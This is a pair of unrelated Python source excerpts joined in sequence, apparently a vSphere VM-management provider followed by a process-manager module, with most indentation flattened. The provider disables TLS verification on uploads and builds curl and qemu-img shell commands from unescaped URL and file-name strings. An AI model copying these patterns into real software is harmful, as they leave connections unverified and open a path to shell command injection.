diskinterface = default_diskinterface
diskpool = default_pool
elif isinstance(disk, dict):
disksize = disk.get('size', default_disksize)
diskthin = disk.get('thin', default_diskthin)
diskinterface = disk.get('interface', default_diskinterface)
diskpool = disk.get('pool', default_pool)
if index < len(currentdisks) and image is not None:
currentdisk = currentdisks[index]
currentsize = convert(1000 * currentdisk.capacityInKB, GB=False)
if int(currentsize) < disksize:
pprint("Waiting for image disk %s to be resized" % index)
currentdisk.capacityInKB = disksize * 1048576
diskspec = vim.vm.ConfigSpec()
diskspec = vim.vm.device.VirtualDeviceSpec(device=currentdisk, operation="edit")
devconfspec.append(diskspec)
continue
disksize = disksize * 1048576
if diskpool not in datastores:
datastore = find(si, rootFolder, vim.Datastore, diskpool)
if not datastore:
return {'result': 'failure', 'reason': "Pool %s not found" % diskpool}
else:
datastores[diskpool] = datastore
if index == 0:
scsispec = createscsispec()
devconfspec.append(scsispec)
diskspec = creatediskspec(index, disksize, datastore, diskmode, diskthin)
devconfspec.append(diskspec)
# NICSPEC
for index, net in enumerate(nets):
netname = net['name'] if isinstance(net, dict) else net
if netname == 'default':
netname = 'VM Network'
if index < len(currentnics):
currentnic = currentnics[index]
try:
currentnetwork = currentnic.backing.deviceName
except:
currentswitchuuid = currentnic.backing.port.switchUuid
currentportgroupkey = currentnic.backing.port.portgroupKey
for dvsnet in self.portgs:
if self.portgs[dvsnet][0] == currentswitchuuid and\
self.portgs[dvsnet][1] == currentportgroupkey:
currentnetwork = dvsnet
if currentnetwork != netname:
if netname in self.portgs:
switchuuid = self.portgs[netname][0]
portgroupkey = self.portgs[netname][1]
currentnic.backing.port.switchUuid = switchuuid
currentnic.backing.port.portgroupKey = portgroupkey
nicspec = vim.vm.device.VirtualDeviceSpec(device=currentnic, operation="edit")
devconfspec.append(nicspec)
elif netname in self.networks:
currentnic.backing.deviceName = netname
nicspec = vim.vm.device.VirtualDeviceSpec(device=currentnic, operation="edit")
devconfspec.append(nicspec)
else:
return {'result': 'failure', 'reason': "Invalid network %s" % netname}
continue
nicname = 'Network Adapter %d' % (index + 1)
nictype = net['type'] if isinstance(net, dict) and 'type' in net else None
if netname in self.portgs:
switchuuid = self.portgs[netname][0]
portgroupkey = self.portgs[netname][1]
nicspec = createdvsnicspec(nicname, netname, switchuuid, portgroupkey, nictype=nictype)
elif netname in self.networks:
nicspec = createnicspec(nicname, netname, nictype=nictype)
else:
return {'result': 'failure', 'reason': "Invalid network %s" % netname}
devconfspec.append(nicspec)
if iso:
if '/' not in iso:
matchingisos = [i for i in self._getisos() if i.endswith(iso)]
if matchingisos:
iso = matchingisos[0]
else:
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
cdspec = createisospec(iso)
devconfspec.append(cdspec)
# bootoptions = vim.option.OptionValue(key='bios.bootDeviceClasses',value='allow:hd,cd,fd,net')
# confspec.bootOptions = vim.vm.BootOptions(bootOrder=[vim.vm.BootOptions.BootableCdromDevice()])
confspec.deviceChange = devconfspec
t = vm.Reconfigure(confspec)
waitForMe(t)
if start:
t = vm.PowerOnVM_Task(None)
waitForMe(t)
return {'result': 'success'}
def start(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
if vm.runtime.powerState == "poweredOff":
t = vm.PowerOnVM_Task(None)
waitForMe(t)
return {'result': 'success'}
def stop(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
if vm.runtime.powerState == "poweredOn":
t = vm.PowerOffVM_Task()
waitForMe(t)
return {'result': 'success'}
def status(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
return vm.runtime.powerState if vm is not None else ''
def delete(self, name, snapshots=False):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
plan, image, kube = 'kvirt', None, None
vmpath = vm.summary.config.vmPathName.replace('/%s.vmx' % name, '')
for entry in vm.config.extraConfig:
if entry.key == 'image':
image = entry.value
if entry.key == 'plan':
plan = entry.value
if entry.key == 'kube':
kube = entry.value
if vm.runtime.powerState == "poweredOn":
t = vm.PowerOffVM_Task()
waitForMe(t)
t = vm.Destroy_Task()
waitForMe(t)
if image is not None and 'coreos' not in image and 'rhcos' not in image and\
'fcos' not in image and vmpath.endswith(name):
isopath = "%s/%s.ISO" % (self.isofolder, name) if self.isofolder is not None else vmpath
deletedirectory(si, dc, isopath)
if kube is not None:
clusterfolder = find(si, vmFolder, vim.Folder, kube)
if clusterfolder is not None and len(clusterfolder.childEntity) == 0:
clusterfolder.Destroy()
elif plan != 'kvirt':
planfolder = find(si, vmFolder, vim.Folder, plan)
if planfolder is not None and len(planfolder.childEntity) == 0:
planfolder.Destroy()
return {'result': 'success'}
def console(self, name, tunnel=False, web=False):
si = self.si
dc = self.dc
vcip = self.vcip
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
print("VM %s not found" % name)
return
elif vm.runtime.powerState == "poweredOff":
print("VM down")
return
extraconfig = vm.config.extraConfig
vncfound = False
        for extra in extraconfig:
            key, value = extra.key, extra.value
            if 'vnc' in key and 'port' in key:
                vncfound = True
                vncport = value
                break
if vncfound:
host = vm.runtime.host.name
url = "vnc://%s:%s" % (host, vncport)
consolecommand = "remote-viewer %s &" % (url)
if web:
return url
if self.debug or os.path.exists("/i_am_a_container"):
print(consolecommand)
if not os.path.exists("/i_am_a_container"):
os.popen(consolecommand)
else:
content = si.RetrieveContent()
sgid = content.about.instanceUuid
cert = get_server_certificate((self.vcip, 443))
cert_deserialize = x509.load_pem_x509_certificate(cert.encode(), default_backend())
finger_print = hexlify(cert_deserialize.fingerprint(hashes.SHA1())).decode('utf-8')
sha1 = ":".join([finger_print[i: i + 2] for i in range(0, len(finger_print), 2)])
vcenter_data = content.setting
vcenter_settings = vcenter_data.setting
for item in vcenter_settings:
key = getattr(item, 'key')
if key == 'VirtualCenter.FQDN':
fqdn = getattr(item, 'value')
sessionmanager = si.content.sessionManager
session = sessionmanager.AcquireCloneTicket()
vmid = vm._moId
vmurl = "https://%s/ui/webconsole.html?" % vcip
vmurl += "vmId=%s&vmName=%s&serverGuid=%s&host=%s&sessionTicket=%s&thumbprint=%s" % (vmid, name, sgid, fqdn,
session, sha1)
if web:
return vmurl
if self.debug or os.path.exists("/i_am_a_container"):
msg = "Open the following url:\n%s" % vmurl if os.path.exists("/i_am_a_container") else vmurl
pprint(msg)
else:
pprint("Opening url %s" % vmurl)
webbrowser.open(vmurl, new=2, autoraise=True)
def info(self, name, output='plain', fields=[], values=False, vm=None, debug=False):
translation = {'poweredOff': 'down', 'poweredOn': 'up', 'suspended': 'suspended'}
yamlinfo = {}
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
if vm is None:
listinfo = False
vm = findvm(si, vmFolder, name)
if vm is None:
error("VM %s not found" % name)
return {}
else:
listinfo = True
summary = vm.summary
yamlinfo['name'] = name
yamlinfo['id'] = summary.config.instanceUuid
yamlinfo['cpus'] = vm.config.hardware.numCPU
yamlinfo['memory'] = vm.config.hardware.memoryMB
yamlinfo['status'] = translation[vm.runtime.powerState]
yamlinfo['nets'] = []
yamlinfo['disks'] = []
if vm.runtime.powerState == "poweredOn":
yamlinfo['host'] = vm.runtime.host.name
for nic in vm.guest.net:
if 'ip' not in yamlinfo and nic.ipAddress:
yamlinfo['ip'] = nic.ipAddress[0]
for entry in vm.config.extraConfig:
if entry.key in METADATA_FIELDS:
yamlinfo[entry.key] = entry.value
if entry.key == 'image':
yamlinfo['user'] = common.get_user(entry.value)
if listinfo:
return yamlinfo
if debug:
yamlinfo['debug'] = vm.config.extraConfig
devices = vm.config.hardware.device
for number, dev in enumerate(devices):
if "addressType" in dir(dev):
try:
network = dev.backing.deviceName
except:
switchuuid = dev.backing.port.switchUuid
portgroupkey = dev.backing.port.portgroupKey
for dvsnet in self.portgs:
if self.portgs[dvsnet][0] == switchuuid and self.portgs[dvsnet][1] == portgroupkey:
network = dvsnet
device = dev.deviceInfo.label
devicename = type(dev).__name__.replace('vim.vm.device.Virtual', '').lower()
networktype = devicename
mac = dev.macAddress
net = {'device': device, 'mac': mac, 'net': network, 'type': networktype}
yamlinfo['nets'].append(net)
if type(dev).__name__ == 'vim.vm.device.VirtualDisk':
device = "disk%s" % dev.unitNumber
disksize = convert(1000 * dev.capacityInKB, GB=False)
diskformat = dev.backing.diskMode
drivertype = 'thin' if dev.backing.thinProvisioned else 'thick'
path = dev.backing.datastore.name
disk = {'device': device, 'size': int(disksize), 'format': diskformat, 'type': drivertype,
'path': path}
yamlinfo['disks'].append(disk)
return yamlinfo
def list(self):
rootFolder = self.rootFolder
si = self.si
vms = []
view = si.content.viewManager.CreateContainerView(rootFolder, [vim.VirtualMachine], True)
vmlist = collectproperties(si, view=view, objtype=vim.VirtualMachine, pathset=['name'], includemors=True)
for o in vmlist:
vm = o['obj']
if vm.summary.runtime.connectionState != 'orphaned' and not vm.config.template:
if self.filtervms and 'plan' not in [x.key for x in vm.config.extraConfig]:
continue
vms.append(self.info(o['name'], vm=vm))
return sorted(vms, key=lambda x: x['name'])
def list_pools(self):
pools = []
rootFolder = self.rootFolder
si = self.si
# dc = self.dc
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
for dts in clu.datastore:
pools.append(dts.name)
# datastorename = dts.name
# total = dssize(dts)[0].replace('GB', '')
# available = dssize(dts)[1].replace('GB', '')
# results[datastorename] = [float(total), float(available), dc.name]
return pools
def beststorage(self):
rootFolder = self.rootFolder
si = self.si
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
bestds = ''
bestsize = 0
for dts in clu.datastore:
datastorename = dts.name
available = float(dssize(dts)[1].replace('GB', ''))
if available > bestsize:
bestsize = available
bestds = datastorename
return bestds
def _getisos(self):
rootFolder = self.rootFolder
si = self.si
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
isos = []
results = {}
searchspec = vim.host.DatastoreBrowser.SearchSpec()
filequery = [vim.host.DatastoreBrowser.IsoImageQuery(), vim.host.DatastoreBrowser.FolderQuery()]
filequeryflags = vim.host.DatastoreBrowser.FileInfo.Details()
filequeryflags.fileSize = True
filequeryflags.modification = False
filequeryflags.fileOwner = False
filequeryflags.fileType = False
searchspec.query = filequery
searchspec.details = filequeryflags
searchspec.sortFoldersFirst = True
searchspec.searchCaseInsensitive = True
for dts in clu.datastore:
datastorename = dts.name
datastorepath = "[" + datastorename + "]"
browser = dts.browser
t = browser.SearchDatastore_Task(datastorepath, searchspec)
waitForMe(t)
result = t.info.result
fileinfo = result.file
for element in fileinfo:
folderpath = element.path
if not folderpath.endswith('iso') and 'ISO' in folderpath.upper():
t = browser.SearchDatastoreSubFolders_Task("%s%s" % (datastorepath, folderpath), searchspec)
waitForMe(t)
results = t.info.result
for r in results:
fileinfo = r.file
for isofile in fileinfo:
path = isofile.path
if path.endswith('.iso'):
isos.append("%s/%s/%s" % (datastorepath, folderpath, path))
return isos
def volumes(self, iso=False):
if iso:
return self._getisos()
si = self.si
rootFolder = self.rootFolder
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.VirtualMachine], True)
vmlist = o.view
o.Destroy()
        return [v.name for v in vmlist
                if v.config.template and v.summary is not None
                and v.summary.runtime.connectionState != 'orphaned']
def update_metadata(self, name, metatype, metavalue, append=False):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
configspec = vim.vm.ConfigSpec()
opt = vim.option.OptionValue()
opt.key = metatype
opt.value = metavalue
configspec.extraConfig = [opt]
t = vm.ReconfigVM_Task(configspec)
waitForMe(t)
def update_memory(self, name, memory):
print("not implemented")
return
def update_cpus(self, name, numcpus):
print("not implemented")
return
def update_start(self, name, start=True):
print("not implemented")
return
def update_information(self, name, information):
self.update_metadata(name, 'information', information)
return
def update_iso(self, name, iso):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
isos = [i for i in self._getisos() if i.endswith(iso)]
if not isos:
error("Iso %s not found.Leaving..." % iso)
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
else:
iso = isos[0]
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
c = changecd(self.si, vm, iso)
waitForMe(c)
return {'result': 'success'}
def dnsinfo(self, name):
return None, None
def _uploadimage(self, pool, origin, directory, isofolder=None):
si = self.si
rootFolder = self.rootFolder
datastore = find(si, rootFolder, vim.Datastore, pool)
if not datastore:
return {'result': 'failure', 'reason': "Pool %s not found" % pool}
destination = os.path.basename(origin)
if isofolder is not None:
directory = isofolder
url = "https://%s:443/folder/%s/%s?dcPath=%s&dsName=%s" % (self.vcip, directory, destination, self.dc.name,
pool)
client_cookie = si._stub.cookie
cookie_name = client_cookie.split("=", 1)[0]
cookie_value = client_cookie.split("=", 1)[1].split(";", 1)[0]
cookie_path = client_cookie.split("=", 1)[1].split(";", 1)[1].split(";", 1)[0].lstrip()
cookie_text = " " + cookie_value + "; $" + cookie_path
cookie = {cookie_name: cookie_text}
headers = {'Content-Type': 'application/octet-stream'}
with open(origin, "rb") as f:
if hasattr(requests.packages.urllib3, 'disable_warnings'):
requests.packages.urllib3.disable_warnings()
try:
r = requests.put(url, data=f, headers=headers, cookies=cookie, verify=False)
except:
url = url.replace('/folder', '')
r = requests.put(url, data=f, headers=headers, cookies=cookie, verify=False)
if r.status_code not in [200, 201]:
error("Got status %s with reason: %s" % (r.status_code, r.reason))
def get_pool_path(self, pool):
return pool
def add_disk(self, name, size=1, pool=None, thin=True, image=None, shareable=False, existing=None,
interface='virtio', novm=False, overrides={}):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
spec = vim.vm.ConfigSpec()
unit_number = 0
for dev in vm.config.hardware.device:
if hasattr(dev.backing, 'fileName'):
unit_number = int(dev.unitNumber) + 1
if unit_number == 7:
unit_number = 8
if isinstance(dev, vim.vm.device.VirtualSCSIController):
controller = dev
new_disk_kb = int(size) * 1024 * 1024
disk_spec = vim.vm.device.VirtualDeviceSpec()
disk_spec.fileOperation = "create"
disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
disk_spec.device = vim.vm.device.VirtualDisk()
disk_spec.device.backing = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
disk_spec.device.backing.thinProvisioned = thin
disk_spec.device.backing.diskMode = 'persistent'
disk_spec.device.unitNumber = unit_number
disk_spec.device.capacityInKB = new_disk_kb
disk_spec.device.controllerKey = controller.key
dev_changes = [disk_spec]
spec.deviceChange = dev_changes
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
def delete_disk(self, name=None, diskname=None, pool=None, novm=False):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualDisk) and dev.deviceInfo.label == diskname:
devspec = vim.vm.device.VirtualDeviceSpec()
devspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove
devspec.device = dev
spec = vim.vm.ConfigSpec()
spec.deviceChange = [devspec]
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
return {'result': 'failure', 'reason': "Disk %s not found in %s" % (diskname, name)}
def add_nic(self, name, network):
if network == 'default':
network = 'VM Network'
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
spec = vim.vm.ConfigSpec()
nicnumber = len([dev for dev in vm.config.hardware.device if "addressType" in dir(dev)])
nicname = 'Network adapter %d' % (nicnumber + 1)
nicspec = createnicspec(nicname, network)
nic_changes = [nicspec]
spec.deviceChange = nic_changes
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
def delete_nic(self, name, interface):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualEthernetCard) and dev.deviceInfo.label == interface:
devspec = vim.vm.device.VirtualDeviceSpec()
devspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove
devspec.device = dev
spec = vim.vm.ConfigSpec()
spec.deviceChange = [devspec]
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
return {'result': 'failure', 'reason': "Nic %s not found in %s" % (interface, name)}
def list_networks(self):
si = self.si
rootFolder = si.content.rootFolder
networks = {}
view = si.content.viewManager.CreateContainerView(rootFolder, [vim.dvs.DistributedVirtualPortgroup], True)
dvslist = collectproperties(si, view=view, objtype=vim.dvs.DistributedVirtualPortgroup, pathset=['name'],
includemors=True)
view = si.content.viewManager.CreateContainerView(rootFolder, [vim.Network], True)
netlist = collectproperties(si, view=view, objtype=vim.Network, pathset=['name'], includemors=True)
for o in netlist:
network = o['obj']
cidr, dhcp, domainname = '', '', ''
mode = 'accessible' if network.summary.accessible else 'notaccessible'
networks[network.name] = {'cidr': cidr, 'dhcp': dhcp, 'domain': domainname, 'type': 'routed', 'mode': mode}
for o in dvslist:
network = o['obj']
cidr, dhcp, domainname, mode = '', '', '', ''
networks[network.name] = {'cidr': cidr, 'dhcp': dhcp, 'domain': domainname, 'type': 'routed', 'mode': mode}
return networks
def create_network(self, name, cidr=None, dhcp=True, nat=True, domain=None, plan='kvirt', overrides={}):
        si = self.si
        rootFolder = self.rootFolder
        networkFolder = self.dc.networkFolder
        # Resolve the cluster object so that cluster.host can be iterated below
        cluster = find(si, rootFolder, vim.ComputeResource, self.clu)
net = find(si, rootFolder, vim.Network, name)
if net is not None:
return {'result': 'failure', 'reason': "Network %s already there" % name}
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.DistributedVirtualSwitch], True)
dvnetworks = o.view
o.Destroy()
for dvnetw in dvnetworks:
for portg in dvnetw.portgroup:
if portg.name == name:
return {'result': 'failure', 'reason': "Network %s already there" % name}
if overrides.get('distributed', False):
pnic_specs = []
dvs_host_configs = []
uplink_port_names = []
dvs_create_spec = vim.DistributedVirtualSwitch.CreateSpec()
dvs_config_spec = vim.DistributedVirtualSwitch.ConfigSpec()
dvs_config_spec.name = name
dvs_config_spec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy()
for x in range(len(cluster.host)):
uplink_port_names.append("dvUplink%d" % x)
for host in cluster.host:
dvs_config_spec.uplinkPortPolicy.uplinkPortName = uplink_port_names
dvs_config_spec.maxPorts = 2000
pnic_spec = vim.dvs.HostMember.PnicSpec()
pnic_spec.pnicDevice = 'vmnic1'
pnic_specs.append(pnic_spec)
dvs_host_config = vim.dvs.HostMember.ConfigSpec()
dvs_host_config.operation = vim.ConfigSpecOperation.add
dvs_host_config.host = host
dvs_host_configs.append(dvs_host_config)
dvs_host_config.backing = vim.dvs.HostMember.PnicBacking()
dvs_host_config.backing.pnicSpec = pnic_specs
dvs_config_spec.host = dvs_host_configs
dvs_create_spec.configSpec = dvs_config_spec
dvs_create_spec.productInfo = vim.dvs.ProductSpec(version='5.1.0')
            networkFolder.CreateDistributedVirtualSwitch(dvs_create_spec)
else:
return {'result': 'failure', 'reason': "Not implemented yet for non dvs networks"}
return {'result': 'success'}
def delete_network(self, name=None, cidr=None):
si = self.si
rootFolder = self.rootFolder
try:
net = find(si, rootFolder, vim.dvs.DistributedVirtualPortgroup, name)
net.Destroy()
except:
try:
net = find(si, rootFolder, vim.Network, name)
net.Destroy()
except:
return {'result': 'failure', 'reason': "Network %s not found" % name}
return {'result': 'success'}
def vm_ports(self, name):
return []
def add_image(self, url, pool, short=None, cmd=None, name=None, size=None):
si = self.si
rootFolder = self.rootFolder
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
resourcepool = clu.resourcePool
vmFolder = self.dc.vmFolder
manager = si.content.ovfManager
shortimage = os.path.basename(url).split('?')[0]
if not shortimage.endswith('ova') and not shortimage.endswith('zip') and find_executable('qemu-img') is None:
msg = "qemu-img is required for conversion"
error(msg)
return {'result': 'failure', 'reason': msg}
        if name is None:
            # Derive the image name from the downloaded file when none was provided
            name = shortimage.replace('.ova', '').replace('.x86_64', '')
if shortimage in self.volumes():
pprint("Template %s already there" % shortimage)
return {'result': 'success'}
if not find(si, rootFolder, vim.Datastore, pool):
return {'result': 'failure', 'reason': "Pool %s not found" % pool}
if not os.path.exists('/tmp/%s' % shortimage):
pprint("Downloading locally %s" % shortimage)
downloadcmd = "curl -Lo /tmp/%s -f '%s'" % (shortimage, url)
code = os.system(downloadcmd)
if code != 0:
return {'result': 'failure', 'reason': "Unable to download indicated image"}
else:
pprint("Using found /tmp/%s" % shortimage)
vmdk_path = None
ovf_path = None
if url.endswith('zip'):
with ZipFile("/tmp/%s" % shortimage) as zipf:
for _fil in zipf.namelist():
if _fil.endswith('vmdk'):
vmdk_path = '/tmp/%s' % _fil
elif _fil.endswith('ovf'):
ovf_path = '/tmp/%s' % _fil
if vmdk_path is None or ovf_path is None:
return {'result': 'failure', 'reason': "Incorrect ova file"}
zipf.extractall('/tmp')
elif url.endswith('ova'):
with tarfile.open("/tmp/%s" % shortimage) as tar:
for _fil in [x.name for x in tar.getmembers()]:
if _fil.endswith('vmdk'):
vmdk_path = '/tmp/%s' % _fil
elif _fil.endswith('ovf'):
ovf_path = '/tmp/%s' % _fil
if vmdk_path is None or ovf_path is None:
return {'result': 'failure', 'reason': "Incorrect ova file"}
tar.extractall('/tmp')
else:
extension = os.path.splitext(shortimage)[1].replace('.', '')
vmdk_path = "/tmp/%s" % shortimage.replace(extension, 'vmdk')
if not os.path.exists(vmdk_path):
pprint("Converting qcow2 file to vmdk")
os.popen("qemu-img convert -O vmdk -o subformat=streamOptimized /tmp/%s %s" % (shortimage, vmdk_path))
ovf_path = "/tmp/%s" % shortimage.replace(extension, 'ovf')
commondir = os.path.dirname(common.pprint.__code__.co_filename)
time.sleep(5)
vmdk_info = json.loads(os.popen("qemu-img info %s --output json" % vmdk_path).read())
virtual_size = vmdk_info['virtual-size']
actual_size = vmdk_info['actual-size']
ovfcontent = open("%s/vm.ovf.j2" % commondir).read().format(name=shortimage, virtual_size=virtual_size,
actual_size=actual_size)
with open(ovf_path, 'w') as f:
f.write(ovfcontent)
ovfd = open(ovf_path).read()
ovfd = re.sub('<Name>.*</Name>', '<Name>%s</Name>' % name, ovfd)
datastore = find(si, rootFolder, vim.Datastore, pool)
network = find(si, rootFolder, vim.Network, 'VM Network')
networkmapping = vim.OvfManager.NetworkMapping.Array()
nm = vim.OvfManager.NetworkMapping(name="VM Network", network=network)
networkmapping.append(nm)
spec_params = vim.OvfManager.CreateImportSpecParams(diskProvisioning="thin", networkMapping=networkmapping)
import_spec = manager.CreateImportSpec(ovfd, resourcepool, datastore, spec_params)
lease = resourcepool.ImportVApp(import_spec.importSpec, vmFolder)
while True:
if lease.state == vim.HttpNfcLease.State.ready:
pprint("Uploading vmdk")
warning("If hitting any issues when uploading image, please upload manually")
                host = self._getfirsthost()
url = lease.info.deviceUrl[0].url.replace('*', host.name)
keepalive_thread = Thread(target=keep_lease_alive, args=(lease,))
keepalive_thread.start()
upload_cmd = (
"curl -sS -X POST --insecure -T %s -H 'Content-Type: \
application/x-vnd.vmware-streamVmdk' %s" % (vmdk_path, url))
os.system(upload_cmd)
# lease.Complete()
lease.HttpNfcLeaseComplete()
keepalive_thread.join()
# self.export(name)
# os.remove('/tmp/%s' % shortimage)
# os.remove(ovf_path)
# os.remove(vmdk_path)
return {'result': 'success'}
elif lease.state == vim.HttpNfcLease.State.error:
error("Lease error: %s" % lease.error)
os._exit(1)
    def _getfirsthost(self):
si = self.si
rootFolder = self.rootFolder
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.HostSystem], True)
view = o.view
o.Destroy()
host = view[0] if view else None
return host
def report(self):
si = self.si
about = si.content.about
print("Host: %s" % self.vcip)
print("Datacenter: %s" % self.dc.name)
print("Version: %s" % about.version)
print("Api Version: %s" % about.apiVersion)
print("Datacenter: %s" % self.dc.name)
rootFolder = self.rootFolder
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.HostSystem], True)
view = o.view
o.Destroy()
for h in view:
print("Host: %s" % h.name)
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.ComputeResource], True)
view = o.view
o.Destroy()
for clu in view:
print("Cluster: %s" % clu.name)
for dts in clu.datastore:
print("Pool: %s" % dts.name)
def delete_image(self, image, pool=None):
si = self.si
vmFolder = self.dc.vmFolder
vm = findvm(si, vmFolder, image)
if vm is None or not vm.config.template:
return {'result': 'failure', 'reason': 'Image %s not found' % image}
else:
t = vm.Destroy_Task()
waitForMe(t)
return {'result': 'success'}
def export(self, name, image=None):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
if vm.runtime.powerState == "poweredOn":
t = vm.PowerOffVM_Task()
waitForMe(t)
vm.MarkAsTemplate()
if image is not None:
vm.Rename(image)
return {'result': 'success'}
def list_dns(self, domain):
return []
def create_bucket(self, bucket, public=False):
print("not implemented")
return
def delete_bucket(self, bucket):
print("not implemented")
return
def delete_from_bucket(self, bucket, path):
print("not implemented")
return
def download_from_bucket(self, bucket, path):
print("not implemented")
return
def upload_to_bucket(self, bucket, path, overrides={}, temp_url=False, public=False):
print("not implemented")
return
def list_buckets(self):
print("not implemented")
return []
def list_bucketfiles(self, bucket):
print("not implemented")
return []
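

# --- Illustrative sketch, not part of the original provider ---
# A minimal example of how the lifecycle methods defined above could be
# combined. `provider` is assumed to be an already-constructed instance of
# this provider class (its constructor is defined earlier in the module and
# is not shown here); `name` is the VM to power cycle.
def _example_power_cycle(provider, name):
    if provider.status(name) == 'poweredOn':
        provider.stop(name)
    result = provider.start(name)
    if result['result'] != 'success':
        return result
    return {'result': 'success', 'status': provider.status(name)}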
|
process.py
|
import importlib
import os
import signal
import struct
import time
import subprocess
from abc import ABC, abstractmethod
from multiprocessing import Process
from setproctitle import setproctitle # pylint: disable=no-name-in-module
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.hardware import HARDWARE
from cereal import log
WATCHDOG_FN = "/dev/shm/wd_"
ENABLE_WATCHDOG = os.getenv("NO_WATCHDOG") is None
def launcher(proc, name):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# create new context since we forked
messaging.context = messaging.Context()
# add daemon name to cloudlog ctx
cloudlog.bind(daemon=name)
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning(f"child {proc} got SIGINT")
except Exception:
# can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.monotonic()
while time.monotonic() - t < timeout and process.exitcode is None:
time.sleep(0.001)
class ManagerProcess(ABC):
unkillable = False
daemon = False
sigkill = False
proc = None
enabled = True
name = ""
last_watchdog_time = 0
watchdog_max_dt = None
watchdog_seen = False
shutting_down = False
@abstractmethod
def prepare(self):
pass
@abstractmethod
def start(self):
pass
def restart(self):
self.stop()
self.start()
def check_watchdog(self, started):
if self.watchdog_max_dt is None or self.proc is None:
return
try:
fn = WATCHDOG_FN + str(self.proc.pid)
self.last_watchdog_time = struct.unpack('Q', open(fn, "rb").read())[0]
except Exception:
pass
dt = sec_since_boot() - self.last_watchdog_time / 1e9
if dt > self.watchdog_max_dt:
# Only restart while offroad for now
if self.watchdog_seen and ENABLE_WATCHDOG:
cloudlog.error(f"Watchdog timeout for {self.name} (exitcode {self.proc.exitcode}) restarting ({started=})")
self.restart()
else:
self.watchdog_seen = True
def stop(self, retry=True, block=True):
if self.proc is None:
return
if self.proc.exitcode is None:
if not self.shutting_down:
cloudlog.info(f"killing {self.name}")
sig = signal.SIGKILL if self.sigkill else signal.SIGINT
self.signal(sig)
self.shutting_down = True
if not block:
return
join_process(self.proc, 5)
# If process failed to die send SIGKILL or reboot
if self.proc.exitcode is None and retry:
if self.unkillable:
cloudlog.critical(f"unkillable process {self.name} failed to exit! rebooting in 15 if it doesn't die")
join_process(self.proc, 15)
if self.proc.exitcode is None:
cloudlog.critical(f"unkillable process {self.name} failed to die!")
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info(f"killing {self.name} with SIGKILL")
self.signal(signal.SIGKILL)
self.proc.join()
ret = self.proc.exitcode
cloudlog.info(f"{self.name} is dead with {ret}")
if self.proc.exitcode is not None:
self.shutting_down = False
self.proc = None
return ret
def signal(self, sig):
if self.proc is None:
return
# Don't signal if already exited
if self.proc.exitcode is not None and self.proc.pid is not None:
return
cloudlog.info(f"sending signal {sig} to {self.name}")
os.kill(self.proc.pid, sig)
def get_process_state_msg(self):
state = log.ManagerState.ProcessState.new_message()
state.name = self.name
if self.proc:
state.running = self.proc.is_alive()
state.shouldBeRunning = self.proc is not None and not self.shutting_down
